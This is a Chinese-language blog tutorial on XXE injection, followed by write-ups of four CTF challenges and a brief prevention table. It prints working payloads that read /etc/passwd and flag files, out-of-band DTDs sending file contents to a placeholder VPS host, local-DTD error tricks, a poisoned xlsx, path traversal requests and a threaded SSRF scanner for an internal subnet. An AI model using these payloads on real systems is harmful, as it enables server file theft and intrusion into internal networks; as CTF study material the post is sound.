What is XML external entity injection?

XXE 是指 Web 应用处理一个 XML 文档，该文档可能包含具有 URI 的 XML 实体，这些 URI 解析为预期控制范围之外的文档，从而导致产品将不正确的文档嵌入到其输出中。

既然谈到 XML，首先是了解 XML 的大致语法。你可翻阅如下两篇文章：

WebGoat8.22之XML External Entities

reference: WebGoat-XXE

Visit WebGoat8.22之XML External Entities

XML外部实体注入详解

reference: XXE details

Visit XML外部实体注入详解

其次为了更为深入的了解该漏洞，我打算补一点相关的开发知识。让我们来了解彼时的 Web 服务器遭遇的挑战：

仅限网页展示：HTML主要用于浏览器渲染，无法作为不同系统间数据交换的标准格式。
跨平台兼容性差：HTML文档的结构和内容难以被非浏览器程序直接解析和利用。

这很大程度上是 XML 诞生的原因。也在一定程度注定了 XML 专注于数据内容本身以及数据如何被结构化和传输。因此，XML的主要目标是：

提高互操作性：通过使用标准化的数据格式，不同系统之间可以更容易地交换信息。
简化数据共享：XML允许创建自定义标签，这使得它非常适合用于不同的应用程序之间的数据共享。
增强数据可读性和维护性：尽管XML文件可能比二进制格式更大，但其文本格式易于人类阅读和编写。

从这点来看， XML 和 JSON（更安全、现代）有点类似。实际上，JSON 算是 XML 的升级版。因此，在一定程度上具备 JSON 传输的服务器可能也存在着 XXE 漏洞。正如你永远不知道服务器采用 JSON 时，是否是曾支持并保留对 XML 的支持。

在某些情况下，攻击者可以通过利用 XXE 漏洞执行服务器端请求伪造（SSRF）攻击，升级 XXE 攻击以破坏底层服务器或其他后端基础设施。

How to exploit XXE

Exploiting XXE to retrieve files

要执行从服务器文件系统中检索任意文件的 XXE 注入攻击，您需要通过引入（或编辑）一个 DOCTYPE 元素，该元素定义包含文件路径的外部实体来修改提交的 XML。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

对于现实世界的 XXE 漏洞，提交的 XML 中通常会有大量数据值，其中任何一个都可能在应用程序的响应中使用。要系统地测试 XXE 漏洞，您通常需要单独测试 XML 中的每个数据节点，方法是使用您定义的实体并查看它是否出现在响应中。

Exploiting XXE to perform SSRF attacks

除了 file 协议，XML 还支持 HTTP/HTTPS/gophar/dict/php://filter(/convert.base64-encode/resource=) 等协议。其中 HTTP/HTTPS/gophar/dict 等协议就适合制造 SSRF 攻击。

当然如果你的目标是探测内网存活主机，你需要访问 /etc/hosts//etc/net/arp/etc/net/fib_trie 等文件。这就需要像 file/php://filter等可以读取的服务器本地文件的协议了。

/proc/net/fib_trie 是 Linux 系统中一个非常重要的 网络路由信息文件，它以 前缀树（trie）结构 展示了系统的 FIB（Forwarding Information Base）路由表，也就是内核用于决定 IP 数据包转发路径的核心数据结构。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal-network"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

许多 XXE 漏洞实例是盲的。这意味着 Web 应用程序不会在其响应中返回任何已定义的外部实体的值，因此无法直接检索服务器端文件。

但我们可以使用带外技术 (out-of-band XML，简称 OOB XML) 来查找漏洞并利用它们来泄露数据。有时可能会触发 XML 解析错误，从而导致错误消息中的敏感数据泄露。

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://your-VPS-public-IP-address:port/file.dtd">
%remote;%int;%send;
]>

外部 file.dtd 文件内容如下：

<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://your-VPS-public-IP-address:other-port?p=%file;'>">

Finding hidden attack surface for XXE injection

在许多情况下，XXE 注入漏洞的攻击面是显而易见的，因为应用程序的正常 HTTP 流量包括包含 XML 格式数据的请求。在一些情况下，攻击面不太明显。但，如果查看正确的地方使用一些正确的方式，会在不包含任何 XML 的请求中发现 XXE 攻击面。

XInclude attacks

某些应用程序接收客户端提交的数据，将其嵌入服务器端的 XML 文档中，然后解析文档。例如，将客户端提交的数据放入后端 SOAP 请求中，然后由后端 SOAP 服务处理该请求。

在这种情况下，您无法执行经典的 XXE 攻击，因为您无法控制整个 XML 文档，因此无法定义或修改 DOCTYPE 元素。但，或许可以改用 XInclude。XInclude 是 XML 规范的一部分，它允许从子文档构建 XML 文档。可以在 XML 文档的任何数据值内放置 XInclude 攻击，因此，在您只控制放置在服务器端 XML 文档中的单个数据项的情况下，可以执行该攻击。

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

XXE attacks via file upload

某些应用程序允许用户上传文件，然后在服务器端进行处理。一些常见的文件格式使用 XML 或包含 XML 子组件。基于 XML 的格式示例包括 DOCX、XLSX 等办公文档格式和 SVG 等图像格式。

值得注意的是，Web 应用程序可能希望接收的格式中不包含这些包含 XML 的格式。但仍可能是支持的。

XXE attacks via modified content type

正如我们在介绍中讲的那样，XML 本身重在数据的传输与结构。因此在响应包中可以尝试将数据组织修改为 text/xml、application/xml 等，将数据传输格式修改为 XML 测试对方服务器的行为。

Exploiting XXE to retrieve data by repurposing a local DTD

有时对方可能会采用 WAF 来禁止 OOB XML。这使得我们并不能够使用外部的恶意 .dtd 文件。但是我们可以尝试本地的。

Linux：

<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa 'Your DTD code'>
%local_dtd;

Windows：

<!ENTITY % local_dtd SYSTEM "file:///C:Windows/System32/wbem/xml/cim20.dtd">
<!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'>
%local_dtd;

此时，一般采用的是 Blind XML 中的报错泄露。举一个例子，使用不存在的路径报错泄露敏感信息：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
  <!ELEMENT message (#PCDATA)>
  <!ENTITY id "135601360123502401401250">
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamsa '
    <!ENTITY &#x0025; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x0025; eval "<!ENTITY &#x0026;#x0025; error SYSTEM &#x0027;file:///fakepath/&#x0025;file;&#x0027;>">
  &#x0025;eval;&#x0025;error;
  '>
  %local_dtd;
]>
<message>&id;</message>

Some Examples In CTF Contest

我们将在这展示一些 XML 的利用手法，主要以 CTF 竞赛实例呈现。

BUUCTF | NCTF2019-Fake XML cookbook

我们抓包查看发送的请求：

Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: application/xml;charset=UTF-8
Origin: http://00c243b4-c434-4ea6-b0d8-125c18cd37ce.node5.buuoj.cn:81
Referer: http://00c243b4-c434-4ea6-b0d8-125c18cd37ce.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

<user><username>administrator</username><password>aaaaaaa</password></user>

查看发现这里的传输有点结构化…有点 XML 的意味。然后 F12 查看源码，可以锁定到如下片段：

function doLogin(){
  var username = $("#username").val();
  var password = $("#password").val();
  if(username == "" || password == ""){
    alert("Please enter the username and password!");
    return;
  }

  var data = "<user><username>" + username + "</username><password>" + password + "</password></user>";
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
          var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
          var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
          if(code == "0"){
            $(".msg").text(msg + " login fail!");
          }else if(code == "1"){
            $(".msg").text(msg + " login success!");
          }else{
            $(".msg").text("error:" + msg);
          }
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    });
}

doLogin()通过 jQuery 的 $.ajax 方法将用户输入的用户名和密码以 XML 格式 发送到后端接口 doLogin.php，并根据返回的 XML 数据进行登录状态提示。

从响应报文可以看到对端的后端采用 PHP。PHP 使用 DOMDocument::loadXML() 或其他 XML 解析器来处理用户提交的 XML 数据，并且未禁用外部实体解析，那么攻击者可以构造恶意 XML 提交到该接口，从而读取服务器上的任意文件。

于是我们需要堵上一把😋赌对方的安全配置是存在缺陷的。使用 <!DOCTYPE xxx [<!ENTITY foo SYSTEM "file:///xxx">]> 来尝试读取任意文件：

如上图所示尝试成功，获取flag。至此我们就完成了一道最简单的 XXE 攻击。

BUUCTF | NCTF2019-True XML cookbook

本道例题应该是上一道例题的进阶版。首先，一样的payload是打不通的，显示 “failed to open stream: operation failed in /var/www/html/doLogin.php”。猜测要么是权限不够，要么是 /flag 文件压根不在这台机子上。

其次，本题似乎是不出网的，我利用 http 协议访问了我自己的 VPS 显示 504 timeout。现在就需要扒拉以下 doLogin.php 的内容了。

<?php
   /**
    * autor: c0ny1
    * date: 2018-2-7
    */

    $USERNAME = 'admin';
    $PASSWORD = '024b87931a03f738fff6693ce0a78c88';
    $result = null;

    libxml_disable_entity_loader(false);
    $xmlfile = file_get_contents('php://input');

    try{
      $dom = new DOMDocument();
      $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
      $creds = simplexml_import_dom($dom);

      $username = $creds->username;
      $password = $creds->password;

      if($username == $USERNAME && $password == $PASSWORD){
        $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
      }else{
        $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
      }
    }catch(Exception $e){
      $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
    }

    header('Content-Type: text/html; charset=utf-8');
    echo $result;
?>

可以看到没有做任何的防护啥的，还是更偏向于 /flag 文件并不在漏洞机上。很大概率在内网的某台服务器上，这里利用 http 协议来打一手 SSRF 看看。在此之前现需要确定内网网段，还是看 /proc/net/fib_trie 靠谱一点。

很容易就可以定位到内网网段是 10.244.244.0/24 差不多(更专业点的话，应该是10.0.0.0/8)。然后利用 Burp Suite 的 Intruder 或者利用 requests python module 编写一个 brute force script 也可以。如果不给 Burp Suite 的 Intruder 设置延迟的话会有点慢。两个攻击方法没啥优劣在本题中。

import requests
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import Fore, Style, init
import threading

# 初始化 colorama（用于终端颜色输出）
init(autoreset=True)

# 目标 URL 和 payload 模板
url = "http://b6dfe23d-62b7-4d72-abda-e234bce9a24d.node5.buuoj.cn:81/doLogin.php"

payload_template = '''
<!DOCTYPE user [
<!ENTITY foo SYSTEM "http://10.244.244.{ip_suffix}">
]>
<user>
    <username>&foo;</username>
    <password>aaaaaaaaaa</password>
</user>
'''

# 设置请求头（模拟浏览器行为）
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36",
    "Content-Type": "application/xml, text/xml, */*; q=0.01",
}

# An event to signal all threads to stop
stop_event = threading.Event()

def find_flag(ip_suffix):
    """
    Sends a request for a given IP suffix and checks for the flag.
    Returns the flag if found, otherwise None.
    """
    if stop_event.is_set():
        return None

    payload = payload_template.format(ip_suffix=ip_suffix)

    try:
        response = requests.post(
            url,
            data=payload,
            headers=headers,
            timeout=3
        )

        if "flag{" in response.text:
            flag = response.text.strip()
            print(f"{Fore.GREEN}[+] Flag found from IP suffix {ip_suffix}: {flag}{Style.RESET_ALL}")
            stop_event.set()
            return flag

    except requests.exceptions.RequestException:
        # Ignore connection errors and timeouts to keep the output clean.
        pass
    except Exception as e:
        if not stop_event.is_set():
            print(f"{Fore.RED}[-] Unexpected error on {ip_suffix}: {str(e)}{Style.RESET_ALL}")

    return None

def main():
    MAX_THREADS = 10
    flag_found = None

    print(f"Starting scan with {MAX_THREADS} threads...")

    with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
        futures = {executor.submit(find_flag, i) for i in range(1, 256)}

        for future in as_completed(futures):
            result = future.result()
            if result:
                flag_found = result
                # Shutdown the executor immediately, don't wait for other running tasks
                executor.shutdown(wait=False, cancel_futures=True)
                break

    if flag_found:
        print(f"\n{Fore.GREEN}>>> Scan finished. The flag is: {flag_found}{Style.RESET_ALL}")
    else:
        print(f"\n{Fore.YELLOW}>>> Scan completed, but no flag was found.{Style.RESET_ALL}")

if __name__ == "__main__":
    main()

每个人结果可能会不一样，我是在 10.244.244.216 获取得到flag。

NSSCTF | 网鼎杯2020青龙组-filejava

通过指纹识别可以看到对方采用了 java、openresty。然后就是一个简单的文件上传功能。上传文件后会提供下载功能。简单来说就是一个文件存储/图床服务的样子。

然后对 Download 服务的访问控制功能执行测试，发现访问控制是存在缺陷的：路径穿越

GET /DownloadServlet?filename=../ HTTP/1.1
Host: 1bcd82f2-2308-43db-8714-b12e359a2ab8.node5.buuoj.cn:81
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Connection: close
Cache-Control: max-age=0

发送上述的请求报文，对端返回类似报错 “/usr/local/tomcat/webapps/ROOT/WEB-INF/upload/15/6/.. (Is a directory)“。这样的话直接泄露技术栈采用 tomcat 以及路径构成信息。

基于上述情况，尝试访问敏感文件 /usr/local/tomcat/conf/server.xml :

<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements.  See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License.  You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!-- Note:  A "Server" is not itself a "Container", so you may not
define subcomponents such as "Valves" at this level.
Documentation at /docs/config/server.html
-->
<Server port="8005" shutdown="SHUTDOWN">
  <Listener className="org.apache.catalina.startup.VersionLoggerListener" />
  <!-- Security listener. Documentation at /docs/config/listeners.html
  <Listener className="org.apache.catalina.security.SecurityListener" />
  -->
  <!--APR library loader. Documentation at /docs/apr.html -->
  <Listener className="org.apache.catalina.core.AprLifecycleListener" SSLEngine="on" />
  <!-- Prevent memory leaks due to use of particular java/javax APIs-->
  <Listener className="org.apache.catalina.core.JreMemoryLeakPreventionListener" />
  <Listener className="org.apache.catalina.mbeans.GlobalResourcesLifecycleListener" />
  <Listener className="org.apache.catalina.core.ThreadLocalLeakPreventionListener" />

  <!-- Global JNDI resources
  Documentation at /docs/jndi-resources-howto.html
  -->
  <GlobalNamingResources>
    <!-- Editable user database that can also be used by
    UserDatabaseRealm to authenticate users
    -->
    <Resource name="UserDatabase" auth="Container"
      type="org.apache.catalina.UserDatabase"
      description="User database that can be updated and saved"
      factory="org.apache.catalina.users.MemoryUserDatabaseFactory"
      pathname="conf/tomcat-users.xml" />
  </GlobalNamingResources>

  <!-- A "Service" is a collection of one or more "Connectors" that share
  a single "Container" Note:  A "Service" is not itself a "Container",
  so you may not define subcomponents such as "Valves" at this level.
  Documentation at /docs/config/service.html
  -->
  <Service name="Catalina">

    <!--The connectors can use a shared executor, you can define one or more named thread pools-->
    <!--
    <Executor name="tomcatThreadPool" namePrefix="catalina-exec-"
    maxThreads="150" minSpareThreads="4"/>
    -->


    <!-- A "Connector" represents an endpoint by which requests are received
    and responses are returned. Documentation at :
    Java HTTP Connector: /docs/config/http.html
    Java AJP  Connector: /docs/config/ajp.html
    APR (HTTP/AJP) Connector: /docs/apr.html
    Define a non-SSL/TLS HTTP/1.1 Connector on port 8080
    -->
    <Connector port="8080" protocol="HTTP/1.1"
               connectionTimeout="20000"
               redirectPort="8443" />
    <!-- A "Connector" using the shared thread pool-->
    <!--
    <Connector executor="tomcatThreadPool"
               port="8080" protocol="HTTP/1.1"
               connectionTimeout="20000"
               redirectPort="8443" />
    -->
    <!-- Define an SSL/TLS HTTP/1.1 Connector on port 8443
         This connector uses the NIO implementation. The default
         SSLImplementation will depend on the presence of the APR/native
         library and the useOpenSSL attribute of the
         AprLifecycleListener.
         Either JSSE or OpenSSL style configuration may be used regardless of
         the SSLImplementation selected. JSSE style configuration is used below.
    -->
    <!--
    <Connector port="8443" protocol="org.apache.coyote.http11.Http11NioProtocol"
               maxThreads="150" SSLEnabled="true">
        <SSLHostConfig>
            <Certificate certificateKeystoreFile="conf/localhost-rsa.jks"
                         type="RSA" />
        </SSLHostConfig>
    </Connector>
    -->
    <!-- Define an SSL/TLS HTTP/1.1 Connector on port 8443 with HTTP/2
         This connector uses the APR/native implementation which always uses
         OpenSSL for TLS.
         Either JSSE or OpenSSL style configuration may be used. OpenSSL style
         configuration is used below.
    -->
    <!--
    <Connector port="8443" protocol="org.apache.coyote.http11.Http11AprProtocol"
               maxThreads="150" SSLEnabled="true" >
        <UpgradeProtocol className="org.apache.coyote.http2.Http2Protocol" />
        <SSLHostConfig>
            <Certificate certificateKeyFile="conf/localhost-rsa-key.pem"
                         certificateFile="conf/localhost-rsa-cert.pem"
                         certificateChainFile="conf/localhost-rsa-chain.pem"
                         type="RSA" />
        </SSLHostConfig>
    </Connector>
    -->

    <!-- Define an AJP 1.3 Connector on port 8009 -->
    <!--
    <Connector protocol="AJP/1.3"
               address="::1"
               port="8009"
               redirectPort="8443" />
    -->

    <!-- An Engine represents the entry point (within Catalina) that processes
         every request.  The Engine implementation for Tomcat stand alone
         analyzes the HTTP headers included with the request, and passes them
         on to the appropriate Host (virtual host).
         Documentation at /docs/config/engine.html -->

    <!-- You should set jvmRoute to support load-balancing via AJP ie :
    <Engine name="Catalina" defaultHost="localhost" jvmRoute="jvm1">
    -->
    <Engine name="Catalina" defaultHost="localhost">

      <!--For clustering, please take a look at documentation at:
          /docs/cluster-howto.html  (simple how to)
          /docs/config/cluster.html (reference documentation) -->
      <!--
      <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"/>
      -->

      <!-- Use the LockOutRealm to prevent attempts to guess user passwords
           via a brute-force attack -->
      <Realm className="org.apache.catalina.realm.LockOutRealm">
        <!-- This Realm uses the UserDatabase configured in the global JNDI
             resources under the key "UserDatabase".  Any edits
             that are performed against this UserDatabase are immediately
             available for use by the Realm.  -->
        <Realm className="org.apache.catalina.realm.UserDatabaseRealm"
               resourceName="UserDatabase"/>
      </Realm>

      <Host name="localhost"  appBase="webapps"
            unpackWARs="true" autoDeploy="true">

        <!-- SingleSignOn valve, share authentication between web applications
             Documentation at: /docs/config/valve.html -->
        <!--
        <Valve className="org.apache.catalina.authenticator.SingleSignOn" />
        -->

        <!-- Access log processes all example.
             Documentation at: /docs/config/valve.html
             Note: The pattern used is equivalent to using pattern="common" -->
        <Valve className="org.apache.catalina.valves.AccessLogValve" directory="logs"
               prefix="localhost_access_log" suffix=".txt"
               pattern="%h %l %u %t &quot;%r&quot; %s %b" />

      </Host>
    </Engine>
  </Service>
</Server>

访问敏感文件 /usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml:

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>DownloadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>DownloadServlet</servlet-name>
        <url-pattern>/DownloadServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>ListFileServlet</servlet-name>
        <servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>ListFileServlet</servlet-name>
        <url-pattern>/ListFileServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>UploadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>UploadServlet</servlet-name>
        <url-pattern>/UploadServlet</url-pattern>
    </servlet-mapping>
</web-app>

基于上述两个敏感文件，我们可以知道 tomcat 的监听情况和服务提供情况。我们完全可以利用访问控制失效这一点去尝试下载webapps/ROOT/WEB-INF/classes/cn/abc/servlet/ 目录下的 .class 字节码文件。然后反字节码 java source code 经行一波代码审计。我直接使用 IDEA 去查看 .class 了，当然你也可以使用 JD-GUI 来反编译 .class 文件。

首先啊，可以一眼盯真发现一些版本信息：

System.err.println("poi-ooxml-3.10 has something wrong");

通过这个可以搜索到 ndays - CVE-2014-3529。本题触发 CVE 的相关代码块：

if (filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
    try {
        Workbook wb1 = WorkbookFactory.create(in);
        Sheet sheet = wb1.getSheetAt(0);
        System.out.println(sheet.getFirstRowNum());
    } catch (InvalidFormatException e) {
        System.err.println("poi-ooxml-3.10 has something wrong");
        e.printStackTrace();
    }
}

这里也就是上传一个 excel-xxx.xlsx 文件就可以触发。如果你学习过一点 .xlsx 相关的内容。你会知道 .xlsx、docx 等文件都是一个类似 .zip 的文件。解压之后里面具备 .xml 文件。我们完全可以恶意篡改那个 xml 文件。

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://your-VPS-public-IP-address:port/file.dtd">
%remote;%int;%send;
]>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/custom.xml" ContentType="application/vnd.openxmlformats-officedocument.custom-properties+xml"/><Override PartName="/xl/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml"/><Override PartName="/xl/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/><Override PartName="/xl/worksheets/sheet2.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/><Override PartName="/xl/worksheets/sheet3.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/></Types>

<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://your-VPS-public-IP-address:other-port?p=%file;'>">

然后使用如下指令去监听就好了。

python3 -m http.server port &
nc -lvnp other-port

BUUCTF | GoogleCTF2019-Quals-Bnv

先抓手包看看：

POST /api/search HTTP/1.1
Host: a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Content-Length: 38
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-type: application/json
Accept: */*
Origin: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Referer: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

{"message":"135601360123502401401250"}

从服务上看起来是一个类似于查询的玩意儿。数据传输采用的 json 格式传输，考虑到 JSON 和 XML 的关系以及目前没有其他的切入面(目录/API/后端/中间件)。因此我们尝试修改 Content-type 字段的值。

POST /api/search HTTP/1.1
Host: a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Content-Length: 38
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-type: application/xml
Accept: */*
Origin: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Referer: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

{"message":"135601360123502401401250"}

随后我们可以获取得到报错信息 “Start tag expected, ’<’ not found, line 1, column 1”。从报错信息推测远程服务大概率是支持解析 XML 的。

POST /api/search HTTP/1.1
Host: a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Content-Length: 86
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-type: application/xml
Accept: */*
Origin: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Referer: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8" ?>
<message>"135601360123502401401250"</message>

此时，我们会收到 “Validation failed: no DTD found !, line 2, column 9” 的报错信息。为了修正，我们尝试加入 DTD。

POST /api/search HTTP/1.1
Host: a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Content-Length: 86
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-type: application/xml
Accept: */*
Origin: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Referer: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE message[
<!ENTITY id "135601360123502401401250">
]>
<message>&id;</message>

现在，我们获取得到的报错信息是 “No declaration for element message, line 5, column 24”。我们需要加入一个 <!ELEMENT message (#PCDATA)>。于是我们可以获取得到正常输出。这说明我们已经解析出来 XML 传入的正确格式。

在尝试 OOB XML 时，发现会出不了网。首先，可以正常访问 VPS 的 http 服务。一旦携带 .dtd 文件信息，便访问失败。这说明对端服务器有禁止请求外部的 .dtd 文件。此时，我们只能够去尝试 local dtd 了。

于是，我们可以尝试注入：

<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///fakefile/%file;'>">
%eval;
%error;'>
%local_dtd;

当然上述 payload 还存在问题，因为我们会接收到报错 “EntityValue: ’%’ forbidden except for entities references, line 8, column 48”。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
  <!ELEMENT message (#PCDATA)>
  <!ENTITY id "135601360123502401401250">
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamsa '
    <!ENTITY &#x0025; file SYSTEM "file:///flag">
    <!ENTITY &#x0025; eval "<!ENTITY &#x0026;#x0025; error SYSTEM &#x0027;file:///fakepath/&#x0025;file;&#x0027;>">
  &#x0025;eval;&#x0025;error;
  '>
  %local_dtd;
]>
<message>&id;</message>

需要注意的是，需要在定义 % error 时指定不对其进行解析，否则会报错。因此 & 是必不可少的。只有这样才能在解析 %eval; 时才定义解析 <!ENTITY % error SYSTEM 'file:///fakepath/%file;'>。

How to prevent

Secure Configuration

防御措施	适用漏洞	简要说明
禁用 DTD	XXE、XEE	关闭 DOCTYPE 声明解析
禁用外部实体加载	XXE	禁止加载 `SYSTEM` 实体
禁用参数实体解析	XXE	防止远程 DTD 文件加载
设置实体最大展开次数	XEE	限制递归实体嵌套深度
输入验证与过滤	XXE、XEE	过滤敏感关键字如 `<!ENTITY`
使用安全解析器配置	XXE、XEE	启用安全模式，关闭危险特性
WAF 规则拦截	XXE、XEE	拦截含恶意关键字的请求
日志监控与告警	XXE、XEE	记录可疑请求并触发告警

Use JSON

替换 XML 为 JSON（更安全、现代）

Thanks for reading!

Web Application Security: XXE

Wed Jun 25 2025 Pin

4868 words · 30 minutes

Technology Secure Misconfiguration Bypass Web Application Security

Web Application Security: XXE

What is XML external entity injection?

WebGoat8.22之XML External Entities

XML外部实体注入详解

How to exploit XXE

Exploiting XXE to retrieve files

Exploiting XXE to perform SSRF attacks

Blind XXE vulnerabilities

Finding hidden attack surface for XXE injection

XInclude attacks

XXE attacks via file upload

XXE attacks via modified content type

Exploiting XXE to retrieve data by repurposing a local DTD

Some Examples In CTF Contest

BUUCTF | NCTF2019-Fake XML cookbook

BUUCTF | NCTF2019-True XML cookbook

NSSCTF | 网鼎杯2020青龙组-filejava

BUUCTF | GoogleCTF2019-Quals-Bnv

How to prevent

Secure Configuration

Use JSON

Web Application Security: XXE